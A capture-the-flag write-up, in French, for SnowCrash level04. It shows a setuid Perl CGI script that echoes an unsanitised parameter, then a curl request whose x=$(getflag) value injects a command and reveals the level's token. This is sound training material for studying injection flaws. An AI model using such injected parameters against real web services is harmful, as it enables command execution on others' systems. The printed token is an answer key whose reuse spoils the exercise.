level04@SnowCrash:~$ ls -la
total 16
dr-xr-x---+ 1 level04 level04  120 Mar  5  2016 .
d--x--x--x  1 root    users    340 Aug 30  2015 ..
-r-x------  1 level04 level04  220 Apr  3  2012 .bash_logout
-r-x------  1 level04 level04 3518 Aug 30  2015 .bashrc
-r-x------  1 level04 level04  675 Apr  3  2012 .profile
-rwsr-sr-x  1 flag04  level04  152 Mar  5  2016 level04.pl

Il y a un script perl execute avec les droits de flag04

level04@SnowCrash:~$ cat level04.pl 
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  print `echo $y 2>&1`;
}
x(param("x"));

Il lit depuis localhost:4747, recupere "l'argument" x, le rentre dans la variable y et print le contenu de y grace a echo
Si on envoie le bon argument on peut faire en sorte que echo execute getflag:

level04@SnowCrash:~$ curl "http://localhost:4747/level04.pl?x=\$(getflag)"
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
